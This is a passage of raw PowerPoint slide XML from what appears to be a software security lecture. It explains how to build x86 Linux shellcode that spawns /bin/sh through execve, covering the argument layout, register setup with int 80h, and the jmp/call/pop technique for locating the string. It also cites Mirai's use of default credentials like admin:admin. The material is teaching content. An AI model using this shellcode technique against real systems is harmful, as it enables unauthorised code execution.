                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> 0x80</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15914072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4" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="539655" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We need the null-terminated string "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" somewhere in memory (filename parameter)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We need the address of the string "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" somewhere in memory followed by a NULL pointer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> parameter) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Have the address of a NULL long word somewhere in memory (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> parameter)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We will reuse the null pointer at the end of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102815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DB3E-205D-23B8-468E-1ABD9844D731}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Default Credentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E355310-8454-1B35-5440-4AC957CE5C5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In September 2016, the MIRAI Botnet performed a large-scale DoS attack against the “Krebs On Security” website  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The botnet was created by compromising IoT devices using a set of predefined credential (e.g., “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>admin:admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F5806FA-A3D0-C6D9-C6B9-F42B22D0FF4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="4783184"/>
            <a:ext cx="4499950"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Understanding the Mirai Botnet, USENIX Security 2017</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4D53A0E-5D49-A1B8-B2C6-7768C76FA2C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2128665" y="2808378"/>
            <a:ext cx="4021879" cy="1776330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33876089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t>execve Args</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="541699" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>addr +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>0123456789ABCDEF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>/bin/sh0addr0000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="541703" name="Rectangle 7" descr="Wave"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="4057650"/>
            <a:ext cx="39624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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Null-terminated /bin/sh (filename)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="541710" name="Rectangle 14" descr="Wave"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="3600450"/>
            <a:ext cx="57912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dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Pointer</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to</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null-terminated</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bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>sh</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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>])</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="541711" name="Rectangle 15" descr="Wave"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="2743200"/>
            <a:ext cx="50292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dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Pointer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> word (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>null</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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>[1] and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>[0])</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="541712" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="664308" y="2373922"/>
            <a:ext cx="478692" cy="168372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41713" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2057400" y="2471614"/>
            <a:ext cx="76200" cy="1071685"/>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41714" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3200400" y="2373922"/>
            <a:ext cx="914400" cy="369277"/>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23487954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a:t>Invoking the System Calls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="540677" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copy the address of the string "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copy the address of the address of "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> register (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + 8)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copy the address of the null word into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 80h instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copy 1h into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copy 0h into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 80h instruction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32673656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The String Address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="542723" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The position of the code is unknown</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We need a way to find out “where we are” in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The “call” instruction saves the IP on the stack and jumps to the destination address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If we use a “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” instruction to a “call” instruction that jumps back to the instruction right after the jump, we have the address of the instruction after the “call” instruction on the stack </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Let’s put a “call” instruction right before the “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” string</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27528631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t>The String Address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543747" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="394335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2000">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543748" name="Rectangle 4" descr="Wave"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="3028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2000">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543749" name="Rectangle 5" descr="Wave"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="3257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1800">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543750" name="Rectangle 6" descr="Wave"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="3486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call jump_addr + 1</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2000">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543751" name="Rectangle 7" descr="Wave"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="3714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/bin/sh0????0000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543752" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="2800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3" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="2571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4" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="2343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5" name="Freeform 11"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1905000" y="2000250"/>
            <a:ext cx="304800" cy="16002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543757" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="2114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8" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="1885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9" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="1657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60" name="Rectangle 16" descr="Wave"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="16573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jump_addr</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2000">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543761" name="Rectangle 17" descr="Wave"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="34861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call_addr</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2000">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543762" name="Rectangle 18" descr="Wave"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="37147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str_addr</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2000">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543763" name="Rectangle 19" descr="Wave"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="1657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jmp call_addr</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2000">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543764" name="Freeform 20"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5257800" y="1771650"/>
            <a:ext cx="533400" cy="18288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543765" name="Rectangle 21" descr="Wave"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="1885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dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
